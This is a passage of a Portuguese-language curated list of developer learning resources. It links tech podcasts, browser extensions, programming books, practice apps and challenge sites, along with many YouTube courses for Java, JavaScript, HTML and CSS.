- [Ambev Tech Talk](https://open.spotify.com/show/07cPNODgBHWh2JMkHbZxXG): Podcast da Ambev sobre tecnologia e cerveja
- [Coruja de TI](https://blog.corujadeti.com.br/) - Blog com várias dicas de TI no geral
- [Cooperati](https://cooperati.com.br/) - Site com algumas informações sobre tecnologia
- [Zup](https://www.zup.com.br/blog) - Blog com informação sobre tecnologia
- [Boss Level](https://open.spotify.com/show/003zbichzSTjf3m7W2Sfvc) - O Boss Level é um Podcast sobre desenvolvimento, Frontend, Backend e DevOps
- [Cabeça de Labs](https://www.cabecadelab.com.br/) - O Cabeça de Lab é o podcast do Luizalabs, o laboratório de inovação e tecnologia do Magalu
- [Carreira sem Fronteiras](https://www.carreirasemfronteiras.com.br/) - Podcast com brasileiros que vivem e trabalham no exterior
- [Codigo Aberto](https://www.b9.com.br/shows/codigoaberto/) - Conversas com os profissionais mais influentes do mercado sobre o futuro
- [DioCast](https://castbox.fm/app/castbox/player/id1323408) - Tecnologia geral do canal DioLinux
- [FalaDev](https://open.spotify.com/show/3TNsKUGlP9YbV1pgy3ACrW) - Podcast da Rocketseat sobre desenvolvimento
- [Fronteiras da Ciência](http://www.ufrgs.br/frontdaciencia/) - Ciência, pseudociências e tudo o mais, feito pelo IFUFGRS
- [IT Visionaries (em inglês)](https://mission.org/itvisionaries/) - Tecnologias quentes e inovação
- [Lambda3](https://www.lambda3.com.br/tag/podcast/) - Desenvolvimento de software e tecnologia em geral
- [NerdCast](https://jovemnerd.com.br/nerdcast/) - Tecnologia, ciência e universo POP
- [Pizza de dados](https://pizzadedados.com/) - Ciência de dados e conselhos de carreira
- [PodProgramar](https://podprogramar.com.br/) - Focado em programação, notícias e histórias da área
- [PodTag](https://podtag.com.br/) - Desenvolvimento de software e tecnologia em geral
- [QuebraDev](https://quebradev.com.br/) - Quebrada + tecnologia
- [Fora da Norma](https://www.youtube.com/channel/UCPA5AzEp_MGEVTDSVCkgShg) - Podcast da 42SP sobre o universo Tech.
- [Torne-se um Programador Podcast](https://open.spotify.com/show/50tgLD0cGqINLLLKNDULRl) - Podcast sobre programação e empreendedorismo digital.
## 💼 Business
- [BossaBox](https://bossabox.com/) - Rede de desenvolvedores, designers e gerentes
- [CodeInterview](https://codeinterview.io/) - Realize entrevistas de emprego com codificação ao vivo
- [Impulso](https://impulso.network/) - Uma rede gratuita para impulsionar o seu crescimento profissional
- [Rocket.Chat](https://rocket.chat/) - Chat corporativo open-source e gratuito para equipes
## 🧭 Web Developer Roadmap
- [Web Developer Roadmap](https://github.com/kamranahmedse/developer-roadmap): Trilha de caminhos para seguir para se tornar um desenvolvedor WEB
## 🔩 Extensões para o seu navegador
- [File Icons for GitHub and GitLab](https://chrome.google.com/webstore/detail/file-icons-for-github-and/ficfmibkjjnpogdcfhfokmihanoldbfe)
- [GoFullPage](https://chrome.google.com/webstore/detail/gofullpage-full-page-scre/fdpohaocaechififmbbbbbknoalclacl)
- [Web Developer](https://chrome.google.com/webstore/detail/web-developer/bfbameneiokkgbdmiekhjnmfkcnldhhm?hl=pt-BR)
- [React Developer Tools](https://chrome.google.com/webstore/detail/react-developer-tools/fmkadmapgofadopljbjfkapdkoienihi)
- [Window Resizer](https://chrome.google.com/webstore/detail/window-resizer/kkelicaakdanhinjdeammmilcgefonfh?hl=pt-BR)
- [Vue Devtools](https://chrome.google.com/webstore/detail/vuejs-devtools/nhdogjmejiglipccpnnnanhbledajbpd?hl=pt-BR)
- [Dark Reader](https://chrome.google.com/webstore/detail/dark-reader/eimadpbcbfnmbkopoojfekhnkhdbieeh?hl=pt-BR)
- [CSS Viewer](https://chrome.google.com/webstore/detail/cssviewer/ggfgijbpiheegefliciemofobhmofgce?hl=pt-BR)
- [WhatFont?](https://chrome.google.com/webstore/detail/whatfont/jabopobgcpjmedljpbcaablpmlmfcogm)
- [Octotree](https://chrome.google.com/webstore/detail/octotree-github-code-tree/bkhaagjahfmjljalopjnoealnfndnagc)
- [daily.dev](https://chrome.google.com/webstore/detail/dailydev-the-homepage-dev/jlmpjdjjbgclbocgajdjefcidcncaied)
- [Wappalyzer](https://chrome.google.com/webstore/detail/wappalyzer-technology-pro/gppongmhjkpfnbhagpmjfkannfbllamg)
## 📚 Recomendação de livros
- [Clean Code - Código Limpo](https://g.co/kgs/62wx9t)
- [Refactoring - Refatoração](https://g.co/kgs/Hf2eY3)
- [Clean Archtecture - Arquitertura Limpa](https://www.google.com/search?q=arquitetura+limpa)
- [O Codificador Limpo](https://www.google.com/search?q=codificador+limpo)
- [O programador pragmático](https://g.co/kgs/5nbqB3)
- [Eloquent JavaScript](https://eloquentjavascript.net/)
- [14 Hábitos de Desenvolvedores Altamente Produtivos](https://g.co/kgs/1fGbnx)
- [The Road to learn React (Português)](https://leanpub.com/the-road-to-learn-react-portuguese)
## 📱 Apps para praticar programação
- [SoloLearn](https://www.sololearn.com/home)
- [Pydriod3 Android](https://play.google.com/store/apps/details?id=ru.iiec.pydroid3&hl=en_US&gl=US)
- [Mimo Android](https://play.google.com/store/apps/details?id=com.getmimo&hl=pt_BR&gl=US)
- [Dcoder Android](https://play.google.com/store/apps/details?id=com.paprbit.dcoder&hl=pt_BR&gl=US)
- [Codecademy Android](https://play.google.com/store/apps/details?id=com.ryzac.codecademygo&hl=pt_BR&gl=US)
- [Codecademy iOS](https://apps.apple.com/us/app/codecademy-go/id1376029326)
- [GrassHopper Android](https://play.google.com/store/apps/details?id=com.area120.grasshopper&hl=pt_BR&gl=US6)
## 📘 Sites para treinar projetos front-end
- [Frontend Mentor](https://www.frontendmentor.io/) - Desafios de Programação Front-end, análise dos resultados feita pela comunidade, sem IDE integrada
- [Codier](https://codier.io/challenge) - Desafios de Programação Front-end, análise dos resultados feita pela comunidade. IDE integrada
- [Code Well](https://codewell.cc/) - Treine suas habilidade de HTML e CSS com alguns templates
- [DevChallenge](https://www.devchallenge.com.br/) - Site com desafios de front-end, back-end e mobile
- [CodePen Challenges](https://codepen.io/challenges) - Desafios de Programação Front-end. IDE integrada
- [DevChallenges](https://devchallenges.io/) - Site com desafios de Front-end e Fullstack
- [Codelândia](https://www.figma.com/file/Yb9IBH56g7T1hdIyZ3BMNO/Desafios---Codel%C3%A2ndia?node-id=624%3A2) - Desafios front-end e back-end
## 📗 Sites para treinar projetos back-end
- [Dev Challenge Back-End](https://devchallenge.vercel.app/challenges?type=backend) - Treine suas habilidades com desafios Back-end
- [Codelândia](https://www.figma.com/file/Yb9IBH56g7T1hdIyZ3BMNO/Desafios---Codel%C3%A2ndia?node-id=624%3A2) - Desafios front-end e back-end
## 📙 Sites para treinar projetos mobile
- [Dev Challenge Mobile](https://devchallenge.vercel.app/challenges?type=mobile) - Treine suas habilidades com desafios Mobile
## 🗃️ Ideias para projeto
- [App Ideas](https://github.com/florinpop17/app-ideas) - Compilado de desafios para você testar seus conhecimentos e aumentar seu portfólio
- [What to Code](https://what-to-code.com/) - Compilado de desafios e ideias para você praticar seus códigos e aumentar seu portfólio
## 🦓 Sites e cursos para aprender Java
> Cursos para aprender Java em Português
- [Maratona Java Virado no Jiraya](https://www.youtube.com/playlist?list=PL62G310vn6nFIsOCC0H-C2infYgwm8SWW)
- [Curso de Java para Iniciantes - Grátis, Completo e com Certificado](https://www.youtube.com/playlist?list=PLHz_AreHm4dkI2ZdjTwZA4mPMxWTfNSpR)
- [Curso de Java - Tiago Aguiar](https://www.youtube.com/playlist?list=PLJ0AcghBBWSi6nK2CUkw9ngvwWB1gE8mL)
- [Curso de Java - CFBCursos](https://www.youtube.com/playlist?list=PLx4x_zx8csUjFC5WWjoNUL7LOOD7LCKRW)
- [Maratona Java - O maior curso Java em português](https://www.youtube.com/playlist?list=PL62G310vn6nHrMr1tFLNOYP_c73m6nAzL)
- [Curso de Java Básico Gratuito com Certificado](https://www.youtube.com/playlist?list=PLGxZ4Rq3BOBq0KXHsp5J3PxyFaBIXVs3r)
- [Curso de Java - eXcript](https://www.youtube.com/playlist?list=PLesCEcYj003Rfzs39Y4Bs_chpkE276-gD)
- [Curso de POO Java (Programação Orientada a Objetos)](https://www.youtube.com/playlist?list=PLHz_AreHm4dkqe2aR0tQK74m8SFe-aGsY)
- [Curso de Programação em Java](https://www.youtube.com/playlist?list=PLucm8g_ezqNrQmqtO0qmew8sKXEEcaHvc)
- [Curso - Fundamentos da Linguagem Java](https://www.youtube.com/playlist?list=PLbEOwbQR9lqxdW98mY-40IZQ5i8ZZyeQx)
- [Curso Java Estruturado](https://www.youtube.com/playlist?list=PLGPluF_nhP9p6zWTN88ZJ1q9J_ZK148-f)
- [Curso de Java Completo](https://www.youtube.com/playlist?list=PL6vjf6t3oYOrSx2XQKm3yvNxgjtI1A56P)
- [Curso Programação Java](https://www.youtube.com/playlist?list=PLtchvIBq_CRTAwq_xmHdITro_5vbyOvVw)
- [Curso de Java para Iniciantes](https://www.youtube.com/playlist?list=PLt2CbMyJxu8iQL67Am38O1j5wKLf0AIRZ)
- [Fundamentos do Java para Iniciantes em Programação](https://youtube.com/playlist?list=PLiFLtuN04BS2GSi8Q-haYkRy8KEv6Grvf)
> Cursos para aprender Java em Espanhol
- [Curso de Java desde 0](https://www.youtube.com/playlist?list=PLU8oAlHdN5BktAXdEVCLUYzvDyqRQJ2lk)
- [Curso de programación Java desde cero](https://www.youtube.com/playlist?list=PLyvsggKtwbLX9LrDnl1-K6QtYo7m0yXWB)
- [Curso de Java Completo 2021](https://www.youtube.com/playlist?list=PLt1J5u9LpM59sjPZFl3KYUhTrpwPIhKor)
- [Java Netbeans Completo](https://www.youtube.com/playlist?list=PLCTD_CpMeEKTT-qEHGqZH3fkBgXH4GOTF)
- [Programación en Java](https://www.youtube.com/playlist?list=PLWtYZ2ejMVJkjOuTCzIk61j7XKfpIR74K)
- [Curso de Java 11](https://www.youtube.com/playlist?list=PLf5ldD20p3mHRM3O4yUongNYx6UaELABm)
- [Curso de Java - Jesús Conde](https://www.youtube.com/playlist?list=PL4D956E5314B9C253)
- [Curso de programacion funcional en java](https://www.youtube.com/playlist?list=PLjJ8HhsSfskiDEwgfyF9EznmrSyEukcJa)
> Cursos para aprender Java em Inglês
- [Java Tutorial for Beginners](https://www.youtube.com/watch?v=eIrMbAQSU34&ab_channel=ProgrammingwithMosh)
- [Java Tutorial: Full Course for Beginners](https://www.youtube.com/watch?v=xk4_1vDrzzo&ab_channel=BroCode)
- [Java Full Course](https://www.youtube.com/watch?v=Qgl81fPcLc8&ab_channel=Amigoscode)
- [Java Programming for Beginners – Full Course](https://www.youtube.com/watch?v=A74TOX803D0&ab_channel=freeCodeCamp.org)
- [Intro to Java Programming - Course for Absolute Beginners](https://www.youtube.com/watch?v=GoXwIVyNvX0&ab_channel=freeCodeCamp.org)
- [Learn Java 8 - Full Tutorial for Beginners](https://www.youtube.com/watch?v=grEKMHGYyns&ab_channel=freeCodeCamp.org)
- [Java Full Course 2022 | Java Tutorial For Beginners | Core Java Full Course](https://www.youtube.com/watch?v=CFD9EFcNZTQ&ab_channel=Simplilearn)
- [Java Full Course for Beginners](https://www.youtube.com/watch?v=_3ds4qujpxU&ab_channel=SDET-QAAutomation)
- [Java Full Course | Java Tutorial for Beginners](https://www.youtube.com/watch?v=hBh_CC5y8-s&ab_channel=edureka%21)
- [Java GUI: Full Course](https://www.youtube.com/watch?v=Kmgo00avvEw&ab_channel=BroCode)
- [Java Collections Framework | Full Course](https://www.youtube.com/watch?v=GdAon80-0KA&ab_channel=JavaGuides)
- [Java Programming](https://www.youtube.com/playlist?list=PLBlnK6fEyqRjKA_NuK9mHmlk0dZzuP1P5)
- [Java Complete Course | Placement Series](https://www.youtube.com/playlist?list=PLfqMhTWNBTe3LtFWcvwpqTkUSlB32kJop)
- [Stanford - Java course](https://www.youtube.com/playlist?list=PLA70DBE71B0C3B142)
- [Java Tutorials](https://www.youtube.com/playlist?list=PL_c9BZzLwBRKIMP_xNTJxi9lIgQhE51rF)
- [Java Full Course - 2022 | Java Tutorial for Beginners](https://www.youtube.com/playlist?list=PL9ooVrP1hQOEe9EN119lMdwcBxcrBI1D3)
- [Java (Intermediate) Tutorials](https://www.youtube.com/playlist?list=PL27BCE863B6A864E3)
- [Core Java (Full Course)](https://www.youtube.com/playlist?list=PLsjUcU8CQXGFZ7xMUxJBE33FWWykEWm49)
- [Working Class Java Programming & Software Architecture Fundamentals Course](https://www.youtube.com/playlist?list=PLEVlop6sMHCoVFZ8nc_HmXOi8Msrah782)
- [Java Programming Tutorials for Beginners [Complete Course]](https://www.youtube.com/playlist?list=PLIY8eNdw5tW_uaJgi-FL9QwINS9JxKKg2)
- [Java Tutorials For Beginners In Hindi](https://www.youtube.com/playlist?list=PLu0W_9lII9agS67Uits0UnJyrYiXhDS6q)
- [Java Tutorial For Beginners](https://www.youtube.com/playlist?list=PLsyeobzWxl7oZ-fxDYkOToURHhMuWD1BK)
- [Java Tutorial for Beginners - Bro Code](https://www.youtube.com/playlist?list=PLZPZq0r_RZOMhCAyywfnYLlrjiVOkdAI1)
- [Java Programming Tutorial](https://www.youtube.com/playlist?list=PLsyeobzWxl7pFZoGT1NbZJpywedeyzyaf)
- [Java (Beginner) Programming Tutorials](https://www.youtube.com/playlist?list=PLFE2CE09D83EE3E28)
- [Complete Java Course for Beginners](https://www.youtube.com/playlist?list=PLab_if3UBk9-ktSKtoVQoLngTFpj9PIed)
- [Java Tutorial For Beginners (Step by Step tutorial)](https://www.youtube.com/playlist?list=PLS1QulWo1RIbfTjQvTdj8Y6yyq4R7g-Al)
- [Mastering Java Course - Learn Java from ZERO to HERO](https://www.youtube.com/playlist?list=PL6Q9UqV2Sf1gb0izuItEDnU8_YBR-DZi6)
- [Tim Buchalka's Java Course PlayList](https://www.youtube.com/playlist?list=PLXtTjtWmQhg1SsviTmKkWO5n0a_-T0bnD)
- [Java Full Course](https://www.youtube.com/playlist?list=PLrhDANsBnxU9WFTBt73Qog9CH1ox5zI--)
- [Java Course](https://www.youtube.com/playlist?list=PLJSrGkRNEDAhE_nsOkDiC5OvckE7K0bo2)
- [Java Web App Course](https://www.youtube.com/playlist?list=PLcRrh9hGNaln4tPtqsmglKenc3NZW7l9M)
## 🐴 Sites e cursos para aprender JavaScript
> Cursos para aprender JavaScript em Português
- [Curso completo de Javascript - Jornada do Dev](https://goo.gl/zfjfkQ)
- [Curso Javascript Completo 2020 [Iniciantes] + 14 Mini-Projetos](https://youtu.be/i6Oi-YtXnAU)
- [Curso de JavaScript - Curso em Vídeo](https://youtube.com/playlist?list=PLntvgXM11X6pi7mW0O4ZmfUI1xDSIbmTm)
- [Curso de Javascript - CFBCursos](https://youtube.com/playlist?list=PLx4x_zx8csUj3IbPQ4_X5jis_SkCol3eC)
- [JavaScript Completo ES6 - Rodrigo Brito](https://www.rodrigobrito.dev.br/blog/js-0701-javascript-completo-es6-classes)
- [Fundamentos de JavaScript Funcional](https://www.cod3r.com.br/courses/javascript-funcional-fundamentos)
- [Curso JavaScript Moderno ES6 - William Justen](https://www.youtube.com/playlist?list=PLlAbYrWSYTiPQ1BE8klOtheBC0mtL3hEi)
- [JavaScript do básico ao avançado (Mapa de estudos / Roadmap)](https://www.youtube.com/watch?v=6YwbZbHRQ8w&ab_channel=AttekitaDev)
- [Curso Javascript Completo - Programação Web](https://www.youtube.com/watch?v=McKNP3g6VBA&ab_channel=Programa%C3%A7%C3%A3oWeb)
- [Curso de Javascript Completo Playlist - Programação Web](https://www.youtube.com/playlist?list=PL2Fdisxwzt_d590u3uad46W-kHA0PTjjw)
- [Curso de JavaScript - Matheus Battisti](https://www.youtube.com/playlist?list=PLnDvRpP8BneysKU8KivhnrVaKpILD3gZ6)
- [Curso de JavaScript Para Completos Iniciantes - Felipe Rocha](https://www.youtube.com/playlist?list=PLm-VCNNTu3LnlPhqxx03kvjQd3qF6EBdz)
- [Curso de JavaScript - Professor Edson Maia](https://www.youtube.com/playlist?list=PLnex8IkmReXxZEXje06kW1uCwm5iC8M_Z)
- [Curso de JavaScript - Node Studio Treinamentos](https://www.youtube.com/playlist?list=PLwXQLZ3FdTVF9Y0RbsuN54XYP7D0dZIlR)
- [Curso de JavaScript - Ayrton Teshima](https://www.youtube.com/playlist?list=PLbA-jMwv0cuWbas947cygrzfzHIc7esmp)
- [Curso de Javascript Completo - Keven Jesus](https://www.youtube.com/playlist?list=PLBnXXDBNZQpJKH1Fx2EAbKbG9p_dV_pKW)
- [Curso de JavaScript ES6 - EdiCursos](https://www.youtube.com/playlist?list=PLLeeWxuGiPrXkGn26nD9OFk20q7MTWYlt)
- [Curso de JavaScript para Iniciantes - RBtech](https://www.youtube.com/playlist?list=PLInBAd9OZCzxl38aAYdyoMHVg0xCgxrRx)
- [Curso de JavaScript - Programação para Web](https://www.youtube.com/playlist?list=PLucm8g_ezqNrXkDWHtgvtU9RGuauEs_xz)
- [Curso de JavaScript - Universidade XTI](https://www.youtube.com/playlist?list=PLxQNfKs8YwvEk85FbeXxDnFecAntIQdRf)
- [Curso de Javascript Puro Orientado a Objetos - Programador Espartano](https://www.youtube.com/playlist?list=PLGwqoftZstLZUQGt3GeLpI-QAZaT8ccVG)
- [Curso JavaScript do Básico ao avançado - PogCast](https://www.youtube.com/playlist?list=PL4iwH9RF8xHlTQb8cPv0HuwKZhR8jEBIK)
- [Curso Completo Javascript para iniciantes - Dev Aprender](https://www.youtube.com/playlist?list=PLnNURxKyyLIIyJ_XKZHzU8SQyGu7yuqhn)
- [Curso de JavaScript Avançado](https://www.youtube.com/playlist?list=PL-R1FQNkywO4sD42B6OI6KjG3uOPT0aNl)
- [Mini projetos utilizando JavaScript - Iniciantes](https://www.youtube.com/playlist?list=PLDgemkIT111AzoS1rB61sgMJbsEA4pyD2)
- [Playlist de Projetos com JavaScript - João Tinti](https://www.youtube.com/playlist?list=PLJ8PYFcmwFOxmqYNlo_H8TYVSDLxB8HdR)
> Cursos para aprender JavaScript em Inglês
- [10 JavaScript Projects in 1 Hour - Coding Challenge](https://www.youtube.com/watch?v=8GPPJpiLqHk)
- [10 JavaScript Projects in 10 Hours - Coding Challenge](https://www.youtube.com/watch?v=dtKciwk_si4)
- [Learn JavaScript - Full Course for Beginners](https://www.youtube.com/watch?v=PkZNo7MFNFg)
- [JavaScript Programming - Full Course](https://www.youtube.com/watch?v=jS4aFq5-91M)
- [JavaScript Full Course for Beginners](https://www.youtube.com/watch?v=EfAl9bwzVZk)
- [JavaScript Course - Hitesh Choudhary](https://www.youtube.com/playlist?list=PLRAV69dS1uWSxUIk5o3vQY2-_VKsOpXLD)
- [Build 15 JavaScript Projects - Vanilla JavaScript Course](https://www.youtube.com/watch?v=3PHXvlpOkf4)
- [Javascript Real World Projects Playlist](https://www.youtube.com/playlist?list=PLajjpPyc2dmbt0KebBvT9VQV8y2R_IO7j)
- [JavaScript Tutorial for Beginners: Learn JavaScript in 1 Hour](https://www.youtube.com/watch?v=W6NZfCO5SIk&ab_channel=ProgrammingwithMosh)
- [JavaScript Tutorial for Beginners - Full Course in 12 Hours (2022)](https://www.youtube.com/watch?v=lI1ae4REbFM&ab_channel=CleverProgrammer)
- [Learn JavaScript by Building 7 Games - Full Course](https://www.youtube.com/watch?v=ec8vSKJuZTk&ab_channel=freeCodeCamp.org)
- [Javascript Full Course for Beginners to Advanced - Amigoscode](https://www.youtube.com/playlist?list=PLqkLaKB2GJhWXV9rcarwvn06ISlL_9mPQ)
- [JavaScript Tutorial For Beginners To Experts | Full Course 2020](https://www.youtube.com/playlist?list=PLqkLaKB2GJhWXV9rcarwvn06ISlL_9mPQ)
- [JavaScript Tutorials for Beginners in Hindi](https://www.youtube.com/playlist?list=PLu0W_9lII9ahR1blWXxgSlL4y9iQBnLpR)
- [JavaScript Basics Course - freeCodeCamp](https://www.youtube.com/playlist?list=PLWKjhJtqVAbk2qRZtWSzCIN38JC_NdhW5)
- [JavaScript for Beginners - Microsoft Developer](https://www.youtube.com/playlist?list=PLlrxD0HtieHhW0NCG7M536uHGOtJ95Ut2)
- [The Complete JavaScript Course 2022: From Zero to Expert - Euniqa](https://www.youtube.com/playlist?list=PLd7dW_Jxkr_Yw6apt7tpzDC6X2mP5UhtQ)
- [The Complete JavaScript Course 2022: From Zero to Expert - zerefJS](https://www.youtube.com/playlist?list=PL0xIL4n2EucHKRzJJe5iqayDdQ3OtEOC9)
- [JavaScript Tutorials - Programming with Mosh](https://www.youtube.com/playlist?list=PLTjRvDozrdlxEIuOBZkMAK5uiqp8rHUax)
- [JavaScript Programming Tutorial - Caleb Curry](https://www.youtube.com/playlist?list=PL_c9BZzLwBRLVh9OdCBYFEql6esA6aRsi)
- [Vanilla JavaScript - Traversy Media](https://www.youtube.com/playlist?list=PLillGF-RfqbbnEGy3ROiLWk7JMCuSyQtX)
- [The Modern JavaScript Bootcamp](https://www.youtube.com/playlist?list=PLxLxC53pX0mJ7mfJJO6tFSyCEyV6ve68j)
- [JavaScript Tutorials - freeCodeCamp](https://www.youtube.com/playlist?list=PLWKjhJtqVAbleDe3_ZA8h3AO2rXar-q2V)
- [JavaScript Projects For Beginners Easy To Advance - Tech2 etc](https://www.youtube.com/playlist?list=PL9bD98LkBR7P16BndaNtP4x6Wf5Ib85Hm)
- [JavaScript Projects Playlist - CodingNepal](https://www.youtube.com/playlist?list=PLpwngcHZlPadhRwryAXw3mJWX5KH3T5L3)
- [JavaScript Projects Playlist - Coding Artist](https://www.youtube.com/playlist?list=PLNCevxogE3fgy0pAzVccadWKaQp9iHspz)
- [JavaScript Projects Playlist - ZinoTrust Academy](https://www.youtube.com/playlist?list=PLQfqQHJBFM1_aAfX64bIShV8k7QCqmHE5)
- [25 Beginner JavaScript projects](https://www.youtube.com/playlist?list=PLtMugc7g4GaqAVDZwQ_t1H6500ZGJzOgW)
- [JavaScript Project Beginners to Advanced - Complete Playlist](https://www.youtube.com/playlist?list=PLjVLYmrlmjGcZJ0oMwKkgwJ8XkCDAb9aG)
- [JavaScript Projects Playlist - dcode](https://www.youtube.com/playlist?list=PLVvjrrRCBy2KvTPJ-HLG4PRqYf-MVJ0h7)
- [JavaScript Projects Playlist - Husam Al-Shehadat](https://www.youtube.com/playlist?list=PLhAYqyL8bdjy10dbfKoxnO4CXyGR9quCs)
- [JavaScript Projects Playlist - CodingLab](https://www.youtube.com/playlist?list=PLImJ3umGjxdAuARwziklrT2QEELizOMtr)
- [JavaScript Projects Real world Projects Playlist](https://www.youtube.com/playlist?list=PLajjpPyc2dmbt0KebBvT9VQV8y2R_IO7j)
- [JavaScript Projects Playlist - Paudie Healy](https://www.youtube.com/playlist?list=PL-tHL4yGBdKvFjT0OF2-yq3at-cMt8qW_)
- [Javascript API Projects](https://www.youtube.com/playlist?list=PLNCevxogE3fiLT6bEObGeVfHVLnttptKv)
- [JavaScript Vanilla Projects Playlist - Online Tutorials](https://www.youtube.com/playlist?list=PL5e68lK9hEzd6RUzREoABqimRI4SY63ND)
- [JavaScript Projects Playlist - Florin Pop](https://www.youtube.com/playlist?list=PLgBH1CvjOA636I8hnHSyuOnX341XQrBth)
- [JavaScript Projects Playlist - Zlad Mohamed](https://www.youtube.com/playlist?list=PLJoT4UFj-n7nL9D2ZCBRismDxN_oHQBl8)
- [JavaScript Projects Playlist - Code With Hossein](https://www.youtube.com/playlist?list=PL5a_Yttx9bWXapYCTkqh-jTOKuNkE20KZ)
## 🐓 Sites e cursos para aprender HTML
> Cursos para aprender HTML em Português
- [Curso de HTML para iniciantes - Aprenda HTML em 1 hora](https://www.youtube.com/watch?v=SV7TL0hxmIQ&ab_channel=MatheusBattisti-HoradeCodar)
- [Curso completo e atual de HTML5 e CSS3 - Módulo 1 de 5](https://www.youtube.com/playlist?list=PLHz_AreHm4dkZ9-atkcmcBaMZdmLHft8n)
- [Curso completo e atual de HTML5 e CSS3 - Módulo 2 de 5](https://www.youtube.com/playlist?list=PLHz_AreHm4dlUpEXkY1AyVLQGcpSgVF8s)
- [Curso completo e atual de HTML5 e CSS3 - Módulo 3 de 5](https://www.youtube.com/playlist?list=PLHz_AreHm4dmcAviDwiGgHbeEJToxbOpZ)
- [Curso completo e atual de HTML5 e CSS3 - Módulo 4 de 5](https://www.youtube.com/playlist?list=PLHz_AreHm4dkcVCk2Bn_fdVQ81Fkrh6WT)
- [Repositório Curso em Video - HTML](https://github.com/gustavoguanabara/html-css):
- [O Guia estelar de HTML - RocketSeat](https://app.rocketseat.com.br/node/o-guia-estelar-de-html)
- [Curso de HTML e CSS Grátis para iniciantes](https://www.youtube.com/playlist?list=PLwgL9IEA0PxUjbhob9UMdpVq12sGrjgU6)
- [HTML Completo e Profissional, todas tags válidas de HTML5](https://www.youtube.com/playlist?list=PLx4x_zx8csUiVHRDO_7qhOaeNrrQ5uU8c)
- [Curso HTML Completo em 4 Horas - Programação Web](https://www.youtube.com/watch?v=nPEpaft1y1k&ab_channel=Programa%C3%A7%C3%A3oWeb)
- [Curso de HTML5 - Node Studio Treinamentos](https://www.youtube.com/playlist?list=PLwXQLZ3FdTVGKl3iPEyEWpFoYkMUxWW5O)
- [Curso de HTML Completo - Programação Web Playlist](https://www.youtube.com/playlist?list=PL2Fdisxwzt_cajoGVWTx44wM6Ht09QJ3A)
- [Curso de HTML Básico - Tecnocencio](https://www.youtube.com/playlist?list=PLn7S0sW6FlsP50d4-3wSepwb_tRm6xMfC)
- [Curso Completo de HTML - Devs Academy](https://www.youtube.com/playlist?list=PLAh4OYmm9AbW-QLfyq7vXsYkshBxVQgvh)
- [Playlist de projetos feitos com HTML - Conrado Saud](https://www.youtube.com/playlist?list=PLAlHucWYYtCS4nxCzJ1vZ_EM1D-t7SGJY)
- [Aprenda HTML em 1 hora - Jornada do Dev](https://goo.gl/1kfBCZ)
> Cursos para aprender HTML em Inglês
- [Learn HTML – Full Tutorial for Beginners (2022)](https://www.youtube.com/watch?v=kUMe1FH4CHE&ab_channel=freeCodeCamp.org)
- [HTML Full Course - Build a Website Tutorial](https://www.youtube.com/watch?v=pQN-pnXPaVg&ab_channel=freeCodeCamp.org)
- [HTML Tutorial for Beginners: HTML Crash Course](https://www.youtube.com/watch?v=qz0aGYrrlhU&ab_channel=ProgrammingwithMosh)
- [HTML Full Course - Bro Code](https://www.youtube.com/watch?v=HD13eq_Pmp8&t=1s&ab_channel=BroCode)
- [HTML Tutorial for Beginners](https://www.youtube.com/playlist?list=PLDVUkWPClxtc-wxTPG02NrdA7RbBogjGW)
- [HTML Complete Course - Beginner to Expert](https://www.youtube.com/playlist?list=PLJ9Lcll8xpWpBuUUc6ykHoCQpdDzauDCg)
- [HTML Course - Zeytoon Tuts](https://www.youtube.com/playlist?list=PLDVUkWPClxtc-wxTPG02NrdA7RbBogjGW)
## 🦄 Sites e cursos para aprender CSS
> Cursos para aprender CSS em Português
- [Curso de CSS para iniciantes - Aprenda CSS e crie um projeto](https://www.youtube.com/watch?v=vwbegraDXD8&ab_channel=MatheusBattisti-HoradeCodar)
- [Curso de CSS Para Completos Iniciantes](https://www.youtube.com/watch?v=r11FflkQqJs&ab_channel=FelipeRocha%E2%80%A2dicasparadevs)
- [O que é CSS? (Seletores, Propriedades & Valores)](https://www.youtube.com/watch?v=LWU2OR19ZG4&ab_channel=RafaellaBallerini)
- [Aprenda CSS em 10 Minutos](https://www.youtube.com/watch?v=lsxBlQWNdUQ&ab_channel=DankiCode)
- [CSS (Cascading Style Sheets) - Dicionário do Programador](https://www.youtube.com/watch?v=229xfk3EEM8&ab_channel=C%C3%B3digoFonteTV)
- [Aprenda Flexbox em 10 Minutos | Tutorial de HTML & CSS](https://www.youtube.com/watch?v=h4FpFvHdm-U&ab_channel=DankiCode)
- [Curso de CSS Completo - Programação Web](https://www.youtube.com/playlist?list=PL2Fdisxwzt_f5C7Mv0kg1EAHhy2VJLf1c)
- [Curso CSS Completo em 7 Horas - Programação Web](https://www.youtube.com/watch?v=w1J6gY40yMo&ab_channel=Programa%C3%A7%C3%A3oWeb)
- [Curso de HTML e CSS grátis para iniciantes](https://www.youtube.com/playlist?list=PLwgL9IEA0PxUjbhob9UMdpVq12sGrjgU6)
- [Curso de CSS3 - Node Studio Treinamentos](https://youtube.com/playlist?list=PLwXQLZ3FdTVGf7GUtiOFLc_9AXO25iIzG)
- [Curso de CSS3 - CFBCursos](https://youtube.com/playlist?list=PLx4x_zx8csUi47Bnugpk78nqJN6rYvEnV)
- [HTML5 & CSS3 na Prática - Node Studio Treinamentos](https://www.youtube.com/playlist?list=PLwXQLZ3FdTVF_HYP5r1oR7vK1_7ZuTU78)
- [Curso Completo de CSS 3 - Jornada do Dev)](https://goo.gl/ebjzVG)
- [Curso de CSS3 com Sass e Compass - Jornada do Dev](https://goo.gl/bAO0hE)
- [Curso CSS Completo - Rodolfo Moreira](https://www.youtube.com/playlist?list=PLWMAkZq0y_ZPCw_p9CvnaKxQBWs7u0pud)
- [Curso HTML e CSS - Projeto Portfólio](https://www.youtube.com/playlist?list=PLirko8T4cEmzrH3jIJi7R7ufeqcpXYaLa)
- [Curso de HTML e CSS - Matheus Battisti](https://www.youtube.com/playlist?list=PLnDvRpP8Bnez2LJGshXKtid2f-aUkFOqM)
- [Curso de CSS Flexbox - Node Studio Treinamentos](https://www.youtube.com/playlist?list=PLwXQLZ3FdTVGjLmjwfRc0Q9TA5U-PCWp4)
- [Curso HTML e CSS - Do Básico ao Avançado](https://www.youtube.com/playlist?list=PL4I-14pHZsLGp5fLi7TtlSVNRg8r4q2NS)
- [Curso HTML e CSS 2021 - Px Masters](https://www.youtube.com/playlist?list=PLquSXjlsANIWVP9xUGLwkCCzOWZs2XkW4)
- [Curso de HTML e CSS Gratuito - Otávio Miranda](https://www.youtube.com/playlist?list=PLbIBj8vQhvm00J3f3rD33tRuNLem8EgEA)
